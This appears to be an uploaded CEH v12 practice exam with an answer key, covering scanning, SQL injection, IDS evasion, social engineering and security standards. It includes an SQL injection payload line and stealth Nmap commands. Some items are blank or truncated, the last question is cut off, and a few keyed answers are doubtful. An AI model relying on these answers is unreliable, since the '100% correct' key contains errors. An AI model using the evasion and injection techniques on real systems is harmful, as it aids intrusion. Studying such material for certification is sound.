
CEH V12 Exam (Latest 2025/ 2026 Update) Certified Ethical Hacker | Questions and Answers | Grade A| 100% Correct (Verified Answers)

Pages: 12
Grade: A+
Uploaded on: 30-06-2025
Written in: 2024/2025

CEH V12 Practice Exam (Latest 2025/ 2026 Update) Certified Ethical Hacker | Questions and Answers | Grade A| 100% Correct (Verified Answers)

Which of the following tools is a command-line vulnerability scanner that scans web servers for dangerous files/CGIs?
A) Snort
B) Kon-Boot
C) John the Ripper
D) Nikto
Answer: Nikto

Michael, a technical specialist, discovered that the laptop of one of the employees connecting to a wireless point couldn't access the internet, but at the same time, it can transfer files locally. He checked the IP address and the default gateway. They are both on 192.168.1.0/24. Which of the following caused the problem?
A) The laptop is using an invalid IP address
B) The laptop and the gateway are not on the same network
C) The laptop isn't using a private IP address
D) The gateway is not routing to a public IP address
Answer: The gateway is not routing to a public IP address

Josh, a security analyst, wants to choose a tool for himself to examine links between data. One of the main requirements is to present data using graphs and link analysis. Which of the following tools will meet John's requirements?
A) Palantir
B) Maltego
C) Analyst's Notebook
D) Metasploit
Answer: Maltego

What describes two-factor authentication for a credit card (using a card and pin)?
A) Something you know and something you are
B) Something you have and something you know
C) Something you are and something you remember
D) Something you have and something you are
Answer: Something you have and something you know

Identify a vulnerability in OpenSSL that allows stealing the information protected under normal conditions by the SSL/TLS encryption used to secure the internet?
A) SSL/TLS Renegotiation Vulnerability
B) POODLE
C) Heartbleed Bug
D) Shellshock
Answer: Heartbleed Bug

You make a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryption. What type of attack are you trying to perform?
A) Adaptive chosen-plaintext attack
B) Ciphertext-only attack
C) Known-plaintext attack
D) Chosen-plaintext attack
Answer: Adaptive chosen-plaintext attack

Which of the following does not apply to IPsec?
A) Provides authentication
B) Use key exchange
C) Encrypts the payloads
D) Work at the Data Link Layer
Answer: Work at the Data Link Layer

Alex, a cybersecurity specialist, received a task from the head to scan open ports. One of the main conditions was to use the most reliable type of TCP scanning. Which of the following types of scanning would Alex use?
A) NULL Scan
B) Half-open Scan
C) TCP Connect/Full Open Scan
D) Xmas Scan
Answer: TCP Connect/Full Open Scan

Which of the following Nmap options will you use if you want to scan fewer ports than the default?
A) -p
B) -sP
C) -T
D) -F
Answer: -F

You conduct an investigation and find out that the browser of one of your employees sent a malicious request that the employee knew nothing about. Identify the web page vulnerability that the attacker used to attack your employee?
A) Cross-Site Request Forgery (CSRF)
B) Command Injection Attacks
C) File Inclusion Attack
D) Hidden Field Manipulation Attack
Answer: Cross-Site Request Forgery (CSRF)

Which of the following programs attacks both the boot sector and executable files?
A) Stealth virus
B) Polymorphic virus
C) Macro virus
D) Multipartite virus
Answer: Multipartite virus

Which of the following is the type of violation when an unauthorized individual enters a building following an employee through the employee entrance?
A) Reverse Social Engineering
B) Tailgating
C) Pretexting
D) Announced
Answer: Tailgating

Maria conducted a successful attack and gained access to a Linux server. She wants to make sure that a NIDS will not catch the subsequent outgoing traffic from this server in the future. Which of the following is the best way to avoid detection of NIDS?
A) Protocol Isolation
B) Out of band signaling
C) Encryption
D) Alternate Data Streams
Answer: Encryption

The company "Usual company" asked a cybersecurity specialist to check their perimeter email gateway security. To do this, the specialist creates a specially formatted email message:
From:
To:
Subject: Test message
Date: 5/8/2021 11:22
He sends this message over the Internet, and a "Usual company" employee receives it. This means that the gateway of this company doesn't prevent _____.
A) Email phishing
B) Email harvesting
C) Email spoofing
D) Email masquerading
Answer: Email Spoofing

How does the mechanism of a Boot Sector Virus work?
A) Moves the MBR to another location on the Random-access memory and copies itself to the original location of the MBR
B) Overwrites the original MBR and only executes the new virus code
C) Modifies directory table entries to point to the virus code instead of the actual MBR
D) Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
Answer: Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR

Which of the options presented below is not a Bluetooth attack?
A) Bluesnarfing
B) Bluesmacking
C) Bluejacking
D) Bluedriving
Answer: Bluedriving

Determine the type of SQL injection:
SELECT * FROM user WHERE name='x' AND userid IS NULL; --';
A) UNION SQL Injection
B) End of Line Comment
C) Illegal/Logically Incorrect Query
D) Tautology
Answer: End of Line Comment

Viktor, a white hat hacker, received an order to perform a penetration test from the company "Test us". He starts collecting information and finds the email of an employee of this company in free access. Viktor decides to send a letter to this email, "". He asks the employee to immediately open the "link with the report" and check it. An employee of the company "Test us" opens this link and infects his computer. Thanks to these manipulations, Viktor gained access to the corporate network and successfully conducted a pentest.
What type of attack did Viktor use?
A) Eavesdropping
B) Piggybacking
C) Tailgating
D) Social engineering
Answer: Social Engineering

Michael works as a system administrator. He receives a message that several sites are no longer available. Michael tried to go to the sites by URL, but it didn't work. Then he tried to ping the sites and enter IP addresses in the browser and it worked. What problem could Michael identify?
A) Traffic is blocked on UDP port 69
B) Traffic is blocked on UDP port 88
C) Traffic is blocked on UDP port 56
D) Traffic is blocked on UDP port 53
Answer: Traffic is blocked on UDP port 53

Benjamin performs a cloud attack during the translation of the SOAP message in the TLS layer. He duplicates the body of the message and sends it to the server as a legitimate user. As a result of these actions, Benjamin managed to gain unauthorized access to the server resources.
A) Cloud Hopper
B) Side-channel
C) Cloudborne
D) Wrapping
Answer: Wrapping

Ivan, an evil hacker, conducts an SQLi attack that is based on True/False questions. What type of SQLi does Ivan use?
A) DMS-specific SQLi
B) Compound SQLi
C) Blind SQLi
D) Classic SQLi
Answer: Blind SQLi

Phillip, a cybersecurity specialist, needs a tool that can function as a network sniffer, record network activity, prevent and detect network intrusion. Which of the following tools is suitable for Phillip?
A) Nessus
B) Cain & Abel
C) Snort
D) Nmap
Answer: Snort

With which of the following SQL injection attacks can an attacker deface a web page, modify or add data in a database and compromise data integrity?
A) Unauthorized access to an application
B) Information disclosure
C) Compromised Data Integrity
D) Loss of data availability
Answer: Compromised Data Integrity

According to the Payment Card Industry Data Security Standard, when is it necessary to conduct external and internal penetration testing?
A) At least once every two years and after any significant upgrade or modification
B) At least once every three years or after any significant upgrade or modification
C) At least twice a year or after any significant upgrade or modification
D) At least once a year and after any significant upgrade or modification
Answer: At least once a year and after any significant upgrade or modification

The attacker enters his malicious data into intercepted messages in a TCP session since source routing is disabled. He tries to guess the response of the client and server. What hijacking technique is described in this example?
A) TCP/IP
B) RST
C) Registration
D) Blind
Answer: Blind

Which of the following is a logical collection of internet-connected devices such as computers, smartphones or internet of things (IoT) devices whose security has been breached and control ceded to a third party?
A) Botnet
B) Spear Phishing
C) Rootkit
D) Spambot
Answer: Botnet

Rajesh, the system administrator, analyzed the IDS logs and noticed that when accessing the external router from the administrator's computer to update the router configuration, IDS registered alerts. What type of alert is this?
A) False negative
B) True negative
C) True positive
D) False positive
Answer: False positive

Which of the following requires establishing national standards for electronic health care transactions and national identifiers for providers, health insurance plans, and employers?
A) PCI-DSS
B) HIPAA
C) DMCA
D) SOX
Answer: HIPAA

Let's assume that you decided to use PKI to protect the email you will send. At what layer of the OSI model will this message be encrypted and decrypted?
A) Session layer
B) Application layer
C) Presentation layer
D) Transport layer
Answer: Presentation layer

Mark, the network administrator, must allow UDP traffic on the host 10.0.0.3 and internet traffic in the host 10.0.0.2. In addition to the main task, he needs to allow all FTP traffic to the rest of the network and deny all other traffic.
Mark applies his ACL configuration on the router, and everyone has a problem with accessing FTP. In addition, hosts that are allowed access to the internet cannot connect to it. In accordance with the following configuration, determine what happened on the network?
access-list 102 deny tcp any any
access-list 104 permit udp host 10.0.0.3 any
access-list 110 permit tcp host 10.0.0.2 eq www any
access-list 108 permit tcp any eq ftp any
A) The ACL 104 needs to be first because it's UDP
B) The ACL 110 needs to be changed to port 80
C) The ACL for FTP must be before the ACL 110
D) The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs
Answer: The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs

Suppose your company has implemented identification of people based on walking patterns and made it part of physical access control to the office. The system works according to the following principle: The camera captures people walking and identifies employees, and then they must attach their RFID badges to access the office. Which of the following best describes this technology?
A) Biological motion cannot be used to identify people
B) The solution implements the two factors authentication: physical object and physical characteristic
C) The solution will have a high level of false positives
D) Although the approach has two phases, it actually implements just one authentication factor
Answer: The solution implements the two factors authentication: physical object and physical characteristic

Which one of the following Google search operators allows restricting results to those from a specific website?
A) [site:]
B) [link:]
C) [inurl:]
D) [cache:]
Answer: [site:]

Identify the Metasploit module used to perform arbitrary, one-off actions such as port scanning, denial of service, SQL injection and fuzzing?
A) Payload module
B) Auxiliary module
C) Exploit module
D) NOPS module
Answer: Auxiliary module

Which of the following is a network software suite designed for 802.11 WEP and WPA-PSK keys cracking that can recover keys once enough data packets have been captured?
A) Aircrack-ng
B) wificracker
C) WLAN-crack
D) Airgaurd
Answer: Aircrack-ng

What is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program?
A) Security testing
B) Concolic Testing
C) Fuzz testing
D) Monkey testing
Answer: Fuzz testing

Which of the following tools is a packet sniffer, network detector and IDS for 802.11(a,b,g,n) wireless LANs?
A) Nessus
B) Abel
C) Kismet
D) Nmap
Answer: Kismet

John, a system administrator, is learning how to work with new technology: Docker. He will use it to create a network connection between the container interfaces and its parent host interface. Which of the following network drivers is suitable for John?
A) Overlay networking
B) Macvlan networking
C) Host networking
D) Bridge networking
Answer: Macvlan networking

The attacker posted a message and an image on the forum, in which he embedded a malicious link. When the victim clicks on this link, the victim's browser sends an authenticated request to a server. What type of attack did the attacker use?
A) Session hijacking
B) SQL injection
C) Cross-site scripting
D) Cross-site request forgery
Answer: Cross-site request forgery

While using your bank's online servicing you notice the following string in the URL bar: http://www.MyPersonalB You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site?
A) XSS Reflection
B) Cookie Tampering
C) SQL injection
D) Web Parameter Tampering
Answer: Web parameter tampering

The evil hacker Antonio is trying to attack the IoT device.
He will use several fake identities to create a strong illusion of traffic congestion, affecting communication between neighbouring nodes and networks. What kind of attack does Antonio perform?
A) Forged malicious device
B) Side-channel attack
C) Sybil attack
D) Exploit kits
Answer: Sybil attack

Which of the following can be designated as "Wireshark for CLI"?
A) Nessus
B) ethereal
C) John the Ripper
D) tcpdump
Answer: tcpdump

What is the purpose of the demilitarized zone?
A) To scan all traffic coming through the DMZ to the internal network
B) To provide a place for a honeypot
C) To add protection to network devices
D) To add an extra layer of security to an organization's local area network
Answer: To add an extra layer of security to an organization's local area network

Which of the following Nmap's commands allows you to most reduce the probability of detection by IDS when scanning common ports?
A) nmap -A --host-timeout 99-T1
B) nmap -sT -O -T0
C) nmap -sT -O -T2
D) nmap -A -Pn
Answer: nmap -sT -O -T0

Jack sent an email to Jenny with a business proposal. Jenny accepted it and fulfilled all her obligations. Jack suddenly refused his offer when everything was ready and said that he had never sent an email. Which of the following digital signature properties will help Jenny prove that Jack is lying?
A) Authentication
B) Non-Repudiation
C) Integrity
D) Confidentiality
Answer: Non-Repudiation

Identify the standard by the description: A regulation contains a set of guidelines that everyone who processes any electronic data in medicine should adhere to. It includes information on medical practices, ensuring that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to secure patient data.
A) FISMA
B) HIPAA
C) COBIT
D) ISO/IEC 27002
Answer: HIPAA

After several unsuccessful attempts to extract cryptography keys using software methods, Mark is thinking about trying another code-breaking methodology.
Which of the following will best suit Mark based on his unsuccessful attempts?
A) One-Time Pad
B) Frequency Analysis
C) Brute-Force
D) Trickery and Deceit
Answer: Trickery and Deceit

What is meant by a "rubber-hose" attack in cryptography?
A) A backdoor is placed into a cryptographic algorithm by its creator
B) Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plain text
C) Extraction of cryptographic secrets through coercion or torture
D) Forcing the targeted keystream through a hardware-accelerated device such as an ASIC
Answer: Extraction of cryptographic secrets through coercion or torture

Which of the following will allow you to prevent unauthorized network access to local area networks and other information assets by wireless devices?
A) AISS
B) WIPS
C) HIDS
D) NIDS
Answer: WIPS

Which of the following ciphers is based on factoring the product of two large prime numbers?
A) MD5
B) RSA
C) RC5
D) SHA-1
Answer: RSA

Which of the following web application attacks injects the special character elements "Carriage Return" and "Line Feed" into the user's input to trick the web server, web application, or user into believing that the current object is terminated and a new object has been initiated?
A) HTML injection
B) Server-Side JS injection
C) CRLF injection
D) Log injection
Answer: CRLF injection

Which of the following is an encryption technique where data is encrypted by a sequence of photons that have a spinning trait while travelling from one end to another?
A) Elliptic Curve Cryptography
B) Quantum Cryptography
C) Homomorphic
D) Hardware-Based
Answer: Quantum Cryptography

Alex, a cyber security specialist, should conduct a pentest inside the network, while he received absolutely no information about the attacked network. What type of testing will Alex conduct?
A) Internal, white-box
B) Internal, black-box
C) Internal, grey-box
D) External, black-box
Answer: Internal, black-box

Which of the following commands will help you launch the Computer Management Console from the "Run" window as a local administrator?
A) B) C) D)

Which of the following SQL injection attacks does an attacker usually use to bypass user authentication and extract data by using a conditional OR clause so that the condition of the WHERE clause will always be true?
A) UNION SQLi
B) End-of-Line Comment
C) Tautology
D) Error-Based SQLi
Answer: Tautology

John, a cybersecurity specialist, received a copy of the event logs from all firewalls, Intrusion Detection Systems (IDS) and proxy servers on a company's network. He tried to match all the registered events in all the logs, and he found that their sequence didn't match. What can cause such a problem?
A) The attacker altered events from the logs
B) A proper chain of custody was not observed while collecting the logs
C) The security breach was a false positive
D) The network devices are not all synchronized
Answer: The network devices are not all synchronized

Ivan, a black hat hacker, sends partial HTTP requests to the target web server to exhaust the target server's maximum concurrent connection pool. He wants to ensure that all additional connection attempts are rejected. What type of attack does Ivan implement?
A) Spoofed Session Flood
B) Slowloris
C) HTTP GET/POST
D) Fragmentation
Answer: Slowloris

Viktor, the white hat hacker, conducts a security audit. He gains control over a user account and tries to access another account's sensitive information and files. How can he do this?
A) Fingerprinting
B) Shoulder-Surfing
C) Privilege Escalation
D) Port Scanning
Answer: Privilege Escalation

Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS?
A) Requires vendor updates for a new threat
B) Cannot deal with encrypted network traffic
C) Produces less false positives
D) Can identify unknown attacks
Answer: Can identify unknown attacks

Based on the following data, you need to calculate the approximate cost of recovery of the system operation per year:
The cost of a new hard drive is $300
The chance of a hard drive failure is 1/3
The recovery specialist earns $10/hour
Restore the OS and software to the new hard disk - 10 hours
Restore the database from the last backup to the new hard disk - 4 hours
Assume the EF = 1 (100%), calculate the SLE, ARO, and ALE
A) $146
B) $295
C) $440
D) $960
Answer: $146
Explanation
1. AV (Asset value) = $300 + (14 * $10) = $440 - the cost of a hard drive plus the work of a recovery person, i.e. how much would it take to replace 1 asset? 10 hours for restoring the OS and software + 4 hours for DB restore, multiplied by the hourly rate of the recovery person.
2. SLE (Single Loss Expectancy) = AV * EF (Exposure Factor) = $440 * 1 = $440
3. ARO (Annual rate of occurrence) = 1/3 (every three years, meaning the probability of occurring during 1 year is 1/3)
4. ALE (Annual Loss Expectancy) = SLE * ARO = 0.33 * $440 = $145.2

Andrew is conducting a penetration test. He is now embarking on sniffing the target network. What is not available for Andrew when sniffing the network?
A) Collecting unencrypted information about usernames and passwords
B) Modifying and replaying captured network traffic
C) Capturing network traffic for further analysis
D) Identifying operating systems, services, protocols, and devices
Answer: Modifying and replaying captured network traffic

Your company has a risk assessment, and according to its results, the risk of a breach in the main company application is 40%. Your cybersecurity department has made changes to the application and requested a re-assessment of the risks. The assessment showed that the risk fell to 12%, with a risk threshold of 20%.
Which of the following options would be the best from a business point of view?
A) Avoid the risk
B) Accept the risk
C) Introduce more controls to bring risk to 0%
D) Limit the risk
Answer: Accept the risk

Which of the following command-line flags set a stealth scan for Nmap?
A) -sM
B) -sU
C) -sT
D) -sS
Answer: -sS

Wireshark is one of the most important tools for a cybersecurity specialist. It is used for network troubleshooting, analysis, software, etc. You often have to work with a packet bytes pane. In what format is the data presented in this pane?
A) ASCII only
B) Decimal
C) Binary
D) Hexadecimal
Answer: Hexadecimal

Identify the Secure Hashing Algorithm that produces a 160-bit digest from a message on principles similar to those used in MD4 and MD5?
A) SHA-0
B) SHA-2
C) SHA-1
D) SHA-3
Answer: SHA-1

Elon plans to make it difficult for the packet filter to determine the purpose of the packet when scanning. Which of the following scanning techniques will Elon use?
A) ACK scanning
B) SYN/FIN scanning using IP fragments
C) ICMP scanning
D) IPID scanning
Answer: SYN/FIN scanning using IP fragments

You analyze the logs and see the following output of logs from the machine with the IP address of 192.168.0.132:
Time August 21 11:22:06 Port:20 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:08 Port:21 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:11 Port:22 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:14 Port:23 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:15 Port:25 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:19 Port:80 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
Time August 21 11:22:21 Port:443 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP
What conclusion can you make based on this output?
A) Port scan targeting 192.168.0.30
B) Teardrop attack targeting 192.168.0.132
C) Denial of service attack targeting 192.168.0.132
D) Port scan targeting 192.168.0.132
Answer: Port scan targeting 192.168.0.132

What is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication, authenticated denial of existence and data integrity, but not availability or confidentiality?
A) Zone transfer
B) Resource records
C) Resource transfer
D) DNSSEC
Answer: DNSSEC

The firewall prevents packets from entering the organization through certain ports and applications. What does this firewall check?
A) Application layer port numbers and the transport layer headers
B) Presentation layer headers and session layer port numbers
C) Application layer headers and transport layer port numbers
D) Network layer headers and the session layer port numbers
Answer: Application layer headers and transport layer port numbers

Which of the following protocols is used in a VPN for setting up a secure channel between two devices?
A) SET
B) PPP
C) PEM
D) IPSEC
Answer: IPSEC

What is a "Collision attack?"
A) Collision attacks try to change the hash
B) Collision attack on a hash tries to find two inputs producing the same hash value
C) Collision attacks attempt to recover information from a hash
D) Collision attacks break the hash into several parts, with the same bytes in each part to get the private key
Answer: Collision attack on a hash tries to find two inputs producing the same hash value

You managed to compromise a server with an IP address of 10.10.0.5, and you want to quickly get a list of all the machines in this network. Which of the following Nmap commands will you need?
A) nmap -T4 -p 10.10.0.0/24
B) nmap -T4 -r 10.10.1.0/24
C) nmap -T4 -F 10.10.0.0/24
D) nmap -T4 -q 10.10.0.0/24
Answer: nmap -T4 -F 10.10.0.0/24

Identify the type of jailbreaking which allows user-level access and does not allow iboot-level access?
A) Userland exploit
B) iBootrom exploit
C) iBoot exploit
D) Bootrom exploit
Answer: Userland exploit

Which regulation defines security and privacy controls for all U.S. federal information systems except those related to national security?
A) HIPAA
B) EU Safe Harbor
C) NIST-800-53
D) PCI-DSS
Answer: NIST-800-53

Which of the following methods is best suited to protect confidential information on your laptop which can be stolen while traveling?
A) Hidden folders
B) Full disk encryption
C) Password protected files
D) BIOS password
Answer: Full disk encryption

The evil hacker Ivan has installed a remote access trojan on a host. He wants to be sure that when a victim attempts to go to "" that the user is directed to a phishing site. Which file should Ivan change in this case?
A) B
B) Sudoers
C) Hosts
D) Networks
Answer: Hosts

Which of the following UDP ports is usually used by Network Time Protocol (NTP)?
A) 19
B) 161
C) 177
D) 123
Answer: 123

Black hat hacker Ivan wants to implement a man-in-the-middle attack on the corporate network. For this, he connects his router to the network and redirects traffic to intercept packets. What can the administrator do to mitigate the attack?
A) Use only static routes in the corporation's network
B) Use the Open Shortest Path First (OSPF)
C) Redirection of the traffic is not possible without the explicit admin's confirmation
D) Add message authentication to the routing protocol
Answer: Add message authentication to the routing protocol

Which of the following layers in IoT architecture helps bridge the gap between two endpoints, such as a device and a client, and carries out message routing, message identification, and subscribing?
A) Access Gateway
B) internet
C) Middleware
D) Edge technology
Answer: Access Gateway

Determine the attack by the description: The known-plaintext attack used against DES. This attack causes that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key.
A) Replay attack
B) Traffic analysis attack
C) Meet-in-the-middle attack
D) Man-in-the-middle attack
Answer: Meet-in-the-middle attack

Often, for a successful attack, hackers very skillfully simulate phishing messages. To do this, they collect the maximum information about the company that they will attack: emails of real employees (including information about the hierarchy in the company), information about the appearance of the message (formatting, logos), etc. What is the name of the stage of the hacker's work?
A) Enumeration stage
B) Exploration stage
C) Reconnaissance stage
D) Investigation stage
Answer: Reconnaissance stage

The web development team is holding an urgent meeting, as they have received information from testers about a new vulnerability in their web software. They make an urgent decision to reduce the likelihood of using the vulnerability. The team decides to modify the software requirements to disallow users from entering HTML as input into their web application. Determine the type of vulnerability that the team found?
A) Cross-site request forgery vulnerability
B) Website defacement vulnerability
C) Cross-site scripting vulnerability
D) SQL injection vulnerability
Answer: Cross-site scripting vulnerability

John needs to choose a firewall that can protect against SQL injection attacks. Which of the following types of firewalls is suitable for this task?
A) Packet firewall
B) Web application firewall
C) Hardware firewall
D) Stateful firewall
Answer: Web application firewall

You know that the application you are attacking is vulnerable to an SQL injection, but you cannot see the result of the injection. You send a SQL query to the database, which makes the database wait before it can react. You can see from the time the database takes to respond, whether a query is true or false. What type of SQL injection did you use?
A) Blind SQLi
B) Out-of-band SQLi
C) Error-based SQLi
D) UNION SQLi
Answer: Blind SQLi

You are configuring the connection of a new employee's laptop to join an 802.11 network. The new laptop has the same hardware and software as the laptops of other employees. You used the wireless packet sniffer and found that it shows that the Wireless Access Point (WAP) is not responding to the association requests being sent by the laptop. What can cause this problem?
A) The WAP does not recognize the laptop's MAC address
B) The laptop is configured for the wrong channel
C) The laptop cannot see the SSID of the wireless network
D) The laptop is not configured to use DHCP
Answer: The WAP does not recognize the laptop's MAC address

Which of the following is not included in the list of recommendations of PCI Data Security Standards?
A) Rotate employees handling credit card transactions on a yearly basis to different departments
B) Do not use vendor-supplied defaults for systems passwords and other security parameters
C) Protect stored cardholder data
D) Encrypt transmission of cardholder data across open, public networks
Answer: Rotate employees handling credit card transactions on a yearly basis to different departments

Which of the following best describes a software firewall?
A) Software firewall is placed between the anti-virus application and the IDS components of the operating system
B) Software firewall is placed between the router and the networking components of the operating systems
C) Software firewall is placed between the desktop and the software components of the operating system
D) Software firewall is placed between the normal application and the networking components of the operating system
Answer: Software firewall is placed between the normal application and the networking components of the operating system

Which of the following wireless standards has bandwidth up to 54 Mbit/s and signals in a regulated frequency spectrum around 5 GHz?
A) 802.11g
B) 802.1n
C) 802.11a
D) 802.11i
Answer: 802.11a

Identify the Bluetooth attack technique that is used to send messages to users without the recipient's consent, for example for guerrilla marketing campaigns?
A) Bluebugging
B) Bluesmacking
C) Bluejacking
D) Bluesnarfing
Answer: Bluejacking

Why is a penetration test considered to be better than a vulnerability scan?
A) The tools used by penetration testers tend to have much more comprehensive vulnerability databases
B) Penetration tests are intended to exploit weakness in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation
C) Vulnerability scans only do host discovery and port scanning by default
D) A penetration test is often performed by an automated tool, while a vulnerability scan requires active engagement
Answer: Penetration tests are intended to exploit weakness in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation

What does the flag "-oX" mean in Nmap?
A) Run an express scan
B) Output the results in truncated format to the screen
C) Run an Xmas scan
D) Output the results in XML format to a file
Answer: Outputs the results in XML format to a file

For the company, an important criterion is the immutability of the financial reports sent by the financial director to the accountant. They need to be sure that the accountant received the reports and it hasn't been changed. How can this be achieved?
A) Financial reports can send the financial statements twice, one by email and the other delivered in USB and the accountant can compare both
B) Reports can send to the accountant using an exclusive USB for that document
C) Use a hash algorithm in the document once CFO approved the financial statements
D) Use a protected excel file
Answer: Use a hash algorithm in the document once CFO approved the financial statement

You have been assigned the task of defending the company from network sniffing.
Which of the following is the best option for this task?
A) Restrict physical access to the server rooms hosting critical servers
B) Use static IP addresses
C) Using encryption protocols to secure network connections
D) Register all machines MAC addresses in a centralized database
Answer: Using encryption protocols to secure network communications

The attacker tries to take advantage of a vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key. Which of the following queries best describes an attempt to exploit an insecure direct object using the name of the valid account "User 1"?
A) "GET/restricted/goldtranfer?to=Account&from=1or1=1'HTTP/1.1Host:"
B) "GET/restricted/accounts/?name=User1HTTP/1.1Host:"
C) "GET/restricted/count("~User1")HTTP/1.1Host:"
D) "GET/restricted/rn%00account%00User1%00accessHTTP/1.1Host:"
Answer: "GET/restricted/accounts/?name=User1 HTTP/1.1Host:"

Imagine the following scenario:
1. An attacker created a website with tempting content and a banner like: "Do you want to make $10,000 in a month?"
2. The victim clicks on the interesting and attractive content URL.
3. The attacker creates a transparent 'iframe' in front of the banner which the victim attempts to click. The victim thinks that he clicks the "Do you want to make $10,000 in a month?" banner but actually he clicks the content or URL that exists in the transparent 'iframe' which is set up by the attacker.
What is the name of the attack used in the scenario?
A) Session fixation
B) HTML injection
C) HTTP parameter pollution
D) Clickjacking attack
Answer: Clickjacking attack

John, a penetration tester, decided to conduct a SQL injection test. He enters a huge amount of random data and observes changes in output and security loopholes in web applications. What SQL injection testing did John use?
A) Function testing
B) Fuzzing testing
C) Static testing
D) Dynamic testing
Answer: Fuzzing testing

Ivan, an evil hacker, is preparing to attack the network of a financial company. To do this, he wants to collect information about the operating systems used on the company's computers. Which of the following techniques will Ivan use to achieve the desired result?
A) SSDP Scanning
B) Banner Grabbing
C) IDLE/IPID Scanning
D) UDP Scanning
Answer: Banner grabbing

Which of the following is a protocol that is used for querying databases that store the registered users or assignees of an internet resource, such as a domain name, an IP address block or an autonomous system?
A) Internet engineering task force
B) CAPTCHA
C) Internet assigned numbers authority
D) WHOIS
Answer: WHOIS

Session splicing is an IDS evasion technique that exploits how some IDSs do not reconstruct sessions before performing pattern matching on the data. The idea behind session splicing is to split data between several packets, ensuring that no single packet matches any patterns within an IDS signature. Which tool can be used to perform session splicing attacks?
A) Whisker
B) tcpsplice
C) Burp
D) Hydra
Answer: Whisker

Which of the following flags will trigger an Xmas scan?
A) -sP
B) -sV
C) -sA
D) -sX
Answer: -sX

Maria is surfing the internet and trying to find information about Super Security LLC. Which process is Maria doing?
A) Enumeration
B) Scanning
C) System Hacking
D) Footprinting
Answer: Footprinting

Which of the following is the amount of risk left over after natural or inherent risks have been reduced?
A) Deferred risk
B) Inherent risk
C) Impact risk
D) Residual risk
Answer: Residual risk

What actions should you take if you find that the company that hired you is involved with human trafficking?
A) Copy the information to removable media and keep it in case you need it
B) Confront the customer and ask her about this
C) Stop work and contact the proper legal authorities
D) Ignore the information and continue the assessment until the work is done
Answer: Stop work and contact the proper legal authorities

Which of the following best describes code injection?
A) Form of attack in which a malicious user gains access to the codebase on the server and inserts new code
B) Form of attack in which a malicious user inserts text into a data field interpreted as code
C) Form of attack in which a malicious user gets the server to execute arbitrary code using a buffer overflow
D) Form of attack in which a malicious user inserts additional code into the JavaScript running in the browser
Answer: Form of attack in which a malicious user inserts text into a data field interpreted as code

What actions should be performed before using a vulnerability scanner for scanning a network?
A) Checking if the remote host is alive
B) Firewall detection
C) TCP/IP stack fingerprinting
D) TCP/UDP port scanning
Answer: Checking if the remote host is alive

Which of the following is the method of determining the movement of a data packet from an untrusted external host to a protected internal host through a firewall?
A) MITM
B) Network sniffing
C) Firewalking
D) Session hijacking
Answer: Firewalking

Rajesh, a system administrator, noticed that some clients of his company were victims of DNS Cache Poisoning. They were redirected to a malicious site when they tried to access Rajesh's company site. What is the best recommendation to deal with such a threat?
A) Customer awareness
B) Use of security agents on customer's computers
C) Use Domain Name System Security Extensions (DNSSEC)
D) Use multi-factor authentication
Answer: Use Domain Name System Security Extensions (DNSSEC)

Ivan, a black hat hacker, tries to call numerous random numbers inside the company, claiming he is from the technical support service.
He offers company employees services in exchange for confidential data or login credentials. What method of social engineering does Ivan use?
A) Reverse social engineering
B) Tailgating
C) Quid Pro Quo
D) Elicitation
Answer: Quid Pro Quo

Ivan, the black hat hacker, split the traffic into many packets such that no single packet triggers the IDS. Which IDS evasion technique does Ivan use?
A) Session splicing
B) Low-bandwidth attacks
C) Flooding
D) Unicode evasion
Answer: Session splicing

Alex, the penetration tester, performs a server scan. To do this, he uses the method where the TCP header is split into many packets so that it becomes difficult to determine what the packets are used for. Determine the scanning technique that Alex uses.
A) Inverse TCP flag scanning
B) ACK flag scanning
C) TCP scanning
D) IP fragmentation scan
Answer: IP fragmentation scan

What identifies malware by collecting data from protected computers while analyzing it on the provider's infrastructure instead of locally?
A) Heuristics-based detection
B) Real-time protection
C) Cloud-based detection
D) Behavioural-based detection
Answer: Cloud-based detection

John performs black-box testing. He tries to pass IRC traffic over port 80/TCP from a compromised web-enabled host during the test. Traffic is blocked, but outbound HTTP traffic does not meet any obstacles. What type of firewall checks outbound traffic?
A) Circuit
B) Application
C) Packet filtering
D) Stateful
Answer: Application

John, a pentester, received an order to conduct an internal audit in the company. One of his tasks is to search for open ports on servers. Which of the following methods is the best solution for this task?
A) Scan servers with Nmap.
B) Telnet to every port on each server.
C) Manual scan on each server.
D) Scan servers with MBSA.
Answer: Scan servers with Nmap

Which layer 3 protocol allows for end-to-end encryption of the connection?
A) SSL
B) FTPS
C) IPsec
D) SFTP
Answer: IPsec

An attacker uses various IDS evasion techniques to bypass intrusion detection mechanisms.
At the same time, the IDS is configured to detect possible violations of the security policy, including unauthorized access and misuse. Which of the following evasion methods depends on the Time-to-Live (TTL) fields of a TCP/IP packet?
A) Unicode evasion
B) Insertion attack
C) Obfuscation
D) Denial-of-service attack
Answer: Insertion attack

Which of the following best describes the "white box testing" methodology?
A) Only the external operation of a system is accessible to the tester
B) The internal operation of a system is completely known to the tester
C) Only the internal operation of a system is known to the tester
D) The internal operation of a system is only partly accessible to the tester
Answer: The internal operation of a system is completely known to the tester

Which of the following is an application security testing method of white-box testing, in which only the source code of applications and their components is scanned to determine potential vulnerabilities in their software and architecture?
